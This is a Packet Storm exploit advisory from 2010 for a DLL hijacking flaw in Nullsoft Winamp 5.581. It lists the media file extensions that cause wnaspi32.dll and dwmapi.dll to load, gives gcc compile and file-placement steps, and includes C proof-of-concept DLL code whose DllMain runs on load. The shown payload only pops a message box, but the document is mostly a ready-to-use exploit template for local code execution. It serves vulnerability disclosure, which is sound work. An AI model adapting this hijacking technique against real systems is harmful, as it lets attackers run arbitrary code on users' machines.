Nullsoft Winamp 5.581 DLL Hijacking Exploit

2010-08-26T00:00:00
ID PACKETSTORM:93156
Type packetstorm
Reporter LiquidWorm
Modified 2010-08-26T00:00:00

Description

                                        
                                            `/*  
  
Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit  
  
Vendor: Nullsoft.  
Product Web Page: http://www.winamp.com  
Affected Version: 5.581 (x86)  
  
Summary: Winamp is a media player for Windows-based PCs,  
written by Nullsoft, now a subsidiary of AOL. It is  
proprietary freeware/shareware, multi-format, extensible  
with plug-ins and skins, and is noted for its graphical  
sound visualization, playlist, and media library features.  
  
Desc: Winamp 5.581 suffers from a dll hijacking vulnerability  
that enables the attacker to execute arbitrary code on a local  
level. The vulnerable extensions are .669, .aac, .aiff, .amf,  
.au, .avr, .b4s, .caf and .cda thru wnaspi32.dll and dwmapi.dll  
libraries.  
  
----  
gcc -shared -o wnaspi32.dll winamp.c  
  
Compile and rename to wnaspi32.dll, create a file test.cda and put both  
files in same dir and execute.  
----  
  
Tested on Microsoft Windows XP Professional SP3 (EN)  
  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
Zero Science Lab - http://www.zeroscience.mk  
  
  
25.08.2010  
  
*/  
  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
dll_mll();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
int dll_mll()  
{  
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);  
}  
`